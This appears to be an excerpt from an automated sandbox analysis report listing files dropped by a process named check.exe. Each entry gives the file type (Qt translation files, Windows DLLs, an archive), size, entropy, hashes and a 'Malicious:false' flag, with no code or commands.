                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):125763
                                                                                                                                                                                                                                      Entropy (8bit):4.80343609423322
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:roXDuC1u/2lUBGjJirE5tsd/aev1GIfOdvhw:OucMGjH5tbm
                                                                                                                                                                                                                                      MD5:3D60E50DCBCBD70EE699BC9B1524FCB9
                                                                                                                                                                                                                                      SHA1:0211B4911B5B74CC1A46C0FCA87D3BF5632AA44A
                                                                                                                                                                                                                                      SHA-256:D586AE2C314074CF398417FDECB40709D5478DFEB0A67C2FE60D509EE9B59ED7
                                                                                                                                                                                                                                      SHA-512:F98211867F1DBCB8A342C00E23FA5718BE6E999F7449CB8470B41BF0F527C7F78CC4D6666E28968F32E96026907156753979BFADA7E6BF4225D02A902D24906D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):194487
                                                                                                                                                                                                                                      Entropy (8bit):4.877239354585035
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:yRRhAFCvqDBitD/iDG9AOH+l4TcwZBPqHo9fd9CFRK+2IKAimxsjucV2p0ZqvRu7:yRRHs5mksWVX3lA3
                                                                                                                                                                                                                                      MD5:6CBC5D8E1EABEC96C281065ECC51E35E
                                                                                                                                                                                                                                      SHA1:4E1E6BA3772428227CB033747006B4887E5D9AD1
                                                                                                                                                                                                                                      SHA-256:6A0BF6E70E7920C2B193E76E92F78F315936955D3B06AC039D917F2E06C43281
                                                                                                                                                                                                                                      SHA-512:CE1F9EE180176153D5F523D71E0DB06F4DEA65C24E5E2CD56341CFAEE349A8E9A0F606D99F7219A35DD4516D1528C90AEA4BB87548A55392B8F2B36164D478B1
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):158274
                                                                                                                                                                                                                                      Entropy (8bit):5.402056706327934
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:jXwjFVUDdMUD4TzdAhpQgO5poZHvJllEnhmdK4I77/dnPJX/imfb1jhvv3BxT8ue:jBzD4Tzaw5pCvJ8hVPdlvj3p8
                                                                                                                                                                                                                                      MD5:D6234E4E21021102B021744D5FA22346
                                                                                                                                                                                                                                      SHA1:63A14327D0CF0941D6D6B58BFA7E8B10337F557B
                                                                                                                                                                                                                                      SHA-256:51B8FF55B37DC5907D637A8DDDA12FBE816852B0244C74EB4F0FB84867A786E0
                                                                                                                                                                                                                                      SHA-512:37D24A092C5F29BACB7A4CA8207C4EEFD0F073B7E74A492402867F758084091BF1D79D2BA2B4A28B35FEF42E8023C371FDE97578F74BB2033551154E77102DE6
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):127849
                                                                                                                                                                                                                                      Entropy (8bit):5.83455389078597
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:Fv2cHP10gOs6dcFxsJopMqOWv2WIrPFP8pa:Fh6s6iFxEodjef8pa
                                                                                                                                                                                                                                      MD5:9C6A3721D01ECAF3F952CE96F46CE046
                                                                                                                                                                                                                                      SHA1:4A944E9E31DF778F7012D8E4A66497583BFD2118
                                                                                                                                                                                                                                      SHA-256:085D29EAF9BBB788B2F2503D74A1EF963A9411CEB600441254CE49A120E1AB63
                                                                                                                                                                                                                                      SHA-512:6E2807B8785F42A26C9CCBDBA0327DD40B529B10C468593F0E74113774D1CCDAA4FD9ACE9B259B9040E1475911428ECAEA49425B0F170862CF8147D23DB48E46
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):2483712
                                                                                                                                                                                                                                      Entropy (8bit):6.241719144701645
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:49152:ZYS8YHrNj4/7RsRLvYpiW3pCBU+Z7bJWvCSBYgbxGJ5M2GM/fXR1fUdihfSbCo6e:9bpj4/7RsRLvYpiW3pCBU+Z7bJWvCSBv
                                                                                                                                                                                                                                      MD5:678FA1496FFDEA3A530FA146DEDCDBCC
                                                                                                                                                                                                                                      SHA1:C80D8F1DE8AE06ECF5750C83D879D2DCC2D6A4F8
                                                                                                                                                                                                                                      SHA-256:D6E45FD8C3B3F93F52C4D1B6F9E3EE220454A73F80F65F3D70504BD55415EA37
                                                                                                                                                                                                                                      SHA-512:8D9E3FA49FB42F844D8DF241786EA9C0F55E546D373FF07E8C89AAC4F3027C62EC1BD0C9C639AFEABC034CC39E424B21DA55A1609C9F95397A66D5F0D834E88E
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):2494976
                                                                                                                                                                                                                                      Entropy (8bit):6.232020603277999
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24576:SUjOoTFrwI8nc6EmRAQ9RzgpP2bXYUKuXeLQp5PjYq0zb:SUqCgnZXRAQ9RzggbozJLQp5Mq
                                                                                                                                                                                                                                      MD5:AE182C36F5839BADDC9DCB71192CFA7A
                                                                                                                                                                                                                                      SHA1:C9FA448981BA61343C7D7DECACAE300CAD416957
                                                                                                                                                                                                                                      SHA-256:A9408E3B15FF3030F0E9ACB3429000D253D3BB7206F750091A7130325F6D0D72
                                                                                                                                                                                                                                      SHA-512:8950244D828C5EDE5C3934CFE2EE229BE19CC00FBF0C4A7CCEBEC19E8641345EF5FD028511C5428E1E21CE5491A3F74FB0175B03DA17588DAEF918E3F66B206A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):5144576
                                                                                                                                                                                                                                      Entropy (8bit):6.262739223310643
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:49152:Qi+reIG7QwktsFPKoe2yicbbqgkcY9abW7KnTYK2bjMkTDGM7y:uqT7Q1kyTvoWW7EYvM9M
                                                                                                                                                                                                                                      MD5:E8C3BFBC19378E541F5F569E2023B7AA
                                                                                                                                                                                                                                      SHA1:ACA007030C1CEE45CBC692ADCB8BCB29665792BA
                                                                                                                                                                                                                                      SHA-256:A1E97A2AB434C6AE5E56491C60172E59CDCCE42960734E8BDF5D851B79361071
                                                                                                                                                                                                                                      SHA-512:9134C2EAD00C2D19DEC499E60F91E978858766744965EAD655D2349FF92834AB267AC8026038E576A7E207D3BBD4A87CD5F2E2846A703C7F481A406130530EB0
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):120320
                                                                                                                                                                                                                                      Entropy (8bit):6.034057886020456
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:pPd5NTdYgpmMrZhekwFH4PqgZNBQmT6V6WRFYE9Icx7pz4H5B:NhTdtmMdEkwuFTSvYE9Iczz4H5
                                                                                                                                                                                                                                      MD5:4F7F9E3A9466F4C0103FB04E1987E098
                                                                                                                                                                                                                                      SHA1:D4A339702E936AA5ECC1FE906AE2BA3BB0E481D7
                                                                                                                                                                                                                                      SHA-256:EBF27146466D61411493D2E243EAC691740F9C4B7A4B9AB0D408BE45B5E0AA35
                                                                                                                                                                                                                                      SHA-512:920BA8D58DCA7946341C1CC01FEA0B76CCE008F1D10061F84455A3DE9BA00FD9534F40C983486211BE92B85F786CD610C386529711A6F573A02BFAF8CA543A19
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):120400
                                                                                                                                                                                                                                      Entropy (8bit):6.6017475353076716
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:N9TXF5LLXQLlNycKW+D4SdqJk6aN1ACuyxLiyazYaCVoecbdhgOwAd+zfZ1zu:N9jelDoD9uyxLizzFzecbdPwA87S
                                                                                                                                                                                                                                      MD5:862F820C3251E4CA6FC0AC00E4092239
                                                                                                                                                                                                                                      SHA1:EF96D84B253041B090C243594F90938E9A487A9A
                                                                                                                                                                                                                                      SHA-256:36585912E5EAF83BA9FEA0631534F690CCDC2D7BA91537166FE53E56C221E153
                                                                                                                                                                                                                                      SHA-512:2F8A0F11BCCC3A8CB99637DEEDA0158240DF0885A230F38BB7F21257C659F05646C6B61E993F87E0877F6BA06B347DDD1FC45D5C44BC4E309EF75ED882B82E4E
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):49744
                                                                                                                                                                                                                                      Entropy (8bit):6.701724666218339
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:ApzzO6ujT3MbR3v0Cz6SR8q83yaFdWr9zRcmgEl6U9zSC:9q/oGw3fFdwzRcmZFzSC
                                                                                                                                                                                                                                      MD5:68156F41AE9A04D89BB6625A5CD222D4
                                                                                                                                                                                                                                      SHA1:3BE29D5C53808186EBA3A024BE377EE6F267C983
                                                                                                                                                                                                                                      SHA-256:82A2F9AE1E6146AE3CB0F4BC5A62B7227E0384209D9B1AEF86BBCC105912F7CD
                                                                                                                                                                                                                                      SHA-512:F7BF8AD7CD8B450050310952C56F6A20B378A972C822CCC253EF3D7381B56FFB3CA6CE3323BEA9872674ED1C02017F78AB31E9EB9927FC6B3CBA957C247E5D57
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):84240
                                                                                                                                                                                                                                      Entropy (8bit):6.607563436050078
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:Kdrz7l1EVLsSuvX3dUK4MLgqK7YEog8y5sV8lIJLVy7SyFB:urzcuvXvrEo7y6V8lIJLVyB
                                                                                                                                                                                                                                      MD5:CB8C06C8FA9E61E4AC5F22EEBF7F1D00
                                                                                                                                                                                                                                      SHA1:D8E0DFC8127749947B09F17C8848166BAC659F0D
                                                                                                                                                                                                                                      SHA-256:FC3B481684B926350057E263622A2A5335B149A0498A8D65C4F37E39DD90B640
                                                                                                                                                                                                                                      SHA-512:E6DA642B7200BFB78F939F7D8148581259BAA9A5EDDA282C621D14BA88083A9B9BD3D17B701E9CDE77AD1133C39BD93FC9D955BB620546BB4FCF45C68F1EC7D6
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):131344
                                                                                                                                                                                                                                      Entropy (8bit):6.311142284249784
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:3RF024DWkT/DKGkXY402iXnVJf/FO50XnekZ39gPhvEQZIJyPArm:j0nHT/DKFXZorf/FO50uW3SEQt
                                                                                                                                                                                                                                      MD5:A55E57D7594303C89B5F7A1D1D6F2B67
                                                                                                                                                                                                                                      SHA1:904A9304A07716497CF3E4EAAFD82715874C94F1
                                                                                                                                                                                                                                      SHA-256:F63C6C7E71C342084D8F1A108786CA6975A52CEFEF8BE32CC2589E6E2FE060C8
                                                                                                                                                                                                                                      SHA-512:FFA61AD2A408A831B5D86B201814256C172E764C9C1DBE0BD81A2E204E9E8117C66F5DFA56BB7D74275D23154C0ED8E10D4AE8A0D0564434E9761D754F1997FC
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):277776
                                                                                                                                                                                                                                      Entropy (8bit):6.5855511991551
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6144:x9iD78EIq4x4OA5bZZ0KDgQcI79qWM53pLW1AFR8E4wXw76TPlpV77777VMvyk:xwDGqr5b8EgQ5+w6k
                                                                                                                                                                                                                                      MD5:F3377F3DE29579140E2BBAEEFD334D4F
                                                                                                                                                                                                                                      SHA1:B3076C564DBDFD4CA1B7CC76F36448B0088E2341
                                                                                                                                                                                                                                      SHA-256:B715D1C18E9A9C1531F21C02003B4C6726742D1A2441A1893BC3D79D7BB50E91
                                                                                                                                                                                                                                      SHA-512:34D9591590BBA20613691A5287EF329E5927A58127CE399088B4D68A178E3AF67159A8FC55B4FCDCB08AE094753B20DEC2AC3F0B3011481E4ED6F37445CECDD5
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):64272
                                                                                                                                                                                                                                      Entropy (8bit):6.220967684620152
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:eNJI0DWiflFwY9X3Th1JnptE462TxNvdbj4dIJvI75YiSyvE62Em:2LDxflFwY9XDhPfVNv+dIJvIF7Syc6c
                                                                                                                                                                                                                                      MD5:32D76C9ABD65A5D2671AEEDE189BC290
                                                                                                                                                                                                                                      SHA1:0D4440C9652B92B40BB92C20F3474F14E34F8D62
                                                                                                                                                                                                                                      SHA-256:838D5C8B7C3212C8429BAF612623ABBBC20A9023EEC41E34E5461B76A285B86C
                                                                                                                                                                                                                                      SHA-512:49DC391F4E63F4FF7D65D6FD837332745CC114A334FD61A7B6AA6F710B235339964B855422233FAC4510CCB9A6959896EFE880AB24A56261F78B2A0FD5860CD9
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):157968
                                                                                                                                                                                                                                      Entropy (8bit):6.854644275249963
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:KbbS4R/G4Z8r7NjwJTSUqCRY4By7znfB9mNowgn0lCelIJ012+j:KbR/8oWeBi5YOwflCe8o
                                                                                                                                                                                                                                      MD5:1BA022D42024A655CF289544AE461FB8
                                                                                                                                                                                                                                      SHA1:9772A31083223ECF66751FF3851D2E3303A0764C
                                                                                                                                                                                                                                      SHA-256:D080EABD015A3569813A220FD4EA74DFF34ED2A8519A10473EB37E22B1118A06
                                                                                                                                                                                                                                      SHA-512:2B888A2D7467E29968C6BB65AF40D4B5E80722FFDDA760AD74C912F3A2F315D402F3C099FDE82F00F41DE6C9FAAEDB23A643337EB8821E594C567506E3464C62
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):33552
                                                                                                                                                                                                                                      Entropy (8bit):6.446391764486538
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:7GpPCRjqMu/AoS6rf7sif0NHQibZIJ9UoOHQIYiSy1pCQ5xX1rSJIVE8E9VF0Nyf:fkTM6rg9aeZIJ9Uok5YiSyvTo2Et
                                                                                                                                                                                                                                      MD5:1C03CAA59B5E4A7FB9B998D8C1DA165A
                                                                                                                                                                                                                                      SHA1:8A318F80A705C64076E22913C2206D9247D30CD7
                                                                                                                                                                                                                                      SHA-256:B9CF502DADCB124F693BF69ECD7077971E37174104DBDA563022D74961A67E1E
                                                                                                                                                                                                                                      SHA-512:783ECDA7A155DFC96A718D5A130FB901BBECBED05537434E779135CBA88233DD990D86ECA2F55A852C9BFB975074F7C44D8A3E4558D7C2060F411CE30B6A915F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):83728
                                                                                                                                                                                                                                      Entropy (8bit):6.331814573029388
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:XuV3gvWHQdMq3ORC/OypTXQlyJ+9+nzEYwsBI6tzOKuZIJywJ7Sy21:XuVQvcQTSypTXQlyJs+nzEYJI6QlZIJY
                                                                                                                                                                                                                                      MD5:FE896371430BD9551717EF12A3E7E818
                                                                                                                                                                                                                                      SHA1:E2A7716E9CE840E53E8FC79D50A77F40B353C954
                                                                                                                                                                                                                                      SHA-256:35246B04C6C7001CA448554246445A845CE116814A29B18B617EA38752E4659B
                                                                                                                                                                                                                                      SHA-512:67ECD9A07DF0A07EDD010F7E3732F3D829F482D67869D6BCE0C9A61C24C0FDC5FF4F4E4780B9211062A6371945121D8883BA2E9E2CF8EB07B628547312DFE4C9
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):181520
                                                                                                                                                                                                                                      Entropy (8bit):5.972827303352998
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:kO+IWyXHllRhN1qhep7fM6CpqjZI8u7pUULbaLZErWreVEzvT3iFCNc6tYwJc1OW:kpSrhN1E2M6CpUuwg5dEW7
                                                                                                                                                                                                                                      MD5:1C0E3E447F719FBE2601D0683EA566FC
                                                                                                                                                                                                                                      SHA1:5321AB73B36675B238AB3F798C278195223CD7B1
                                                                                                                                                                                                                                      SHA-256:63AE2FEFBFBBBC6EA39CDE0A622579D46FF55134BC8C1380289A2976B61F603E
                                                                                                                                                                                                                                      SHA-512:E1A430DA2A2F6E0A1AED7A76CC4CD2760B3164ABC20BE304C1DB3541119942508E53EA3023A52B8BADA17A6052A7A51A4453EFAD1A888ACB3B196881226C2E5C
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):38160
                                                                                                                                                                                                                                      Entropy (8bit):6.338856805460127
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:fEkK9VgWOZbs3550QcJpPllIJLiX5YiSyvQ602Euf0:fE93jkbQcJvlIJLiJ7Syq00
                                                                                                                                                                                                                                      MD5:1C30CC7DF3BD168D883E93C593890B43
                                                                                                                                                                                                                                      SHA1:31465425F349DAE4EDAC9D0FEABC23CE83400807
                                                                                                                                                                                                                                      SHA-256:6435C679A3A3FF4F16708EBC43F7CA62456C110AC1EA94F617D8052C90C143C7
                                                                                                                                                                                                                                      SHA-512:267A1807298797B190888F769D998357B183526DFCB25A6F1413E64C5DCCF87F51424B7E5D6F2349D7A19381909AB23B138748D8D9F5858F7DC0552F5C5846AC
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1394456
                                                                                                                                                                                                                                      Entropy (8bit):5.531698507573688
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12288:IW7WpLV6yNLeGQbVz3YQfiBgDPtLwjFx278e6ZQnHS91lqyL+DXUgnxOr+dx5/GO:B7WpLtHa9BHSHAW+dx5/GP05vddD
                                                                                                                                                                                                                                      MD5:A9CBD0455B46C7D14194D1F18CA8719E
                                                                                                                                                                                                                                      SHA1:E1B0C30BCCD9583949C247854F617AC8A14CBAC7
                                                                                                                                                                                                                                      SHA-256:DF6C19637D239BFEDC8CD13D20E0938C65E8FDF340622FF334DB533F2D30FA19
                                                                                                                                                                                                                                      SHA-512:B92468E71490A8800E51410DF7068DD8099E78C79A95666ECF274A9E9206359F049490B8F60B96081FAFD872EC717E67020364BCFA972F26F0D77A959637E528
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):299427
                                                                                                                                                                                                                                      Entropy (8bit):6.047872935262006
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6144:QW1x/M8fRR1jplkXURrVADwYCuCigT/QRSRqNb7d8iu5Nahx:QWb/TRJLWURrI5RWavdF08/
                                                                                                                                                                                                                                      MD5:50EA156B773E8803F6C1FE712F746CBA
                                                                                                                                                                                                                                      SHA1:2C68212E96605210EDDF740291862BDF59398AEF
                                                                                                                                                                                                                                      SHA-256:94EDEB66E91774FCAE93A05650914E29096259A5C7E871A1F65D461AB5201B47
                                                                                                                                                                                                                                      SHA-512:01ED2E7177A99E6CB3FBEF815321B6FA036AD14A3F93499F2CB5B0DAE5B713FD2E6955AA05F6BDA11D80E9E0275040005E5B7D616959B28EFC62ABB43A3238F0
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):10752
                                                                                                                                                                                                                                      Entropy (8bit):4.818583535960129
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:Mvs10hZd9D74ACb0xx2uKynu10YLsgxwJiUNiL0U5IZsJFPGDtCFCCQAADo+cX6m:MXv9XFCk2z1/t12iwU5usJFuCyPcqgE
                                                                                                                                                                                                                                      MD5:56FE4F6C7E88212161F49E823CCC989A
                                                                                                                                                                                                                                      SHA1:16D5CBC5F289AD90AEAA4FF7CB828627AC6D4ACF
                                                                                                                                                                                                                                      SHA-256:002697227449B6D69026D149CFB220AC85D83B13056C8AA6B9DAC3FD3B76CAA4
                                                                                                                                                                                                                                      SHA-512:7C9D09CF9503F73E6F03D30E54DBB50606A86D09B37302DD72238880C000AE2B64C99027106BA340753691D67EC77B3C6E5004504269508F566BDB5E13615F1E
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):124928
                                                                                                                                                                                                                                      Entropy (8bit):5.953784637413928
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:JDE+0ov6ojgN3qN8h51Zlh+YW5E38vCsmLS:JdefPZE2ICDLS
                                                                                                                                                                                                                                      MD5:10116447F9276F10664BA85A5614BA3A
                                                                                                                                                                                                                                      SHA1:EFD761A3E6D14E897D37AFB0C7317C797F7AE1D6
                                                                                                                                                                                                                                      SHA-256:C393098E7803ABF08EE8F7381AD7B0F8FAFFBF66319C05D72823308E898F8CFC
                                                                                                                                                                                                                                      SHA-512:C04461E52B7FE92D108CBDEB879B7A8553DD552D79C88DFA3F5D0036EED8D4B8C839C0BF2563BC0C796F8280ED2828CA84747CB781D2F26B44214FCA2091EAE4
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
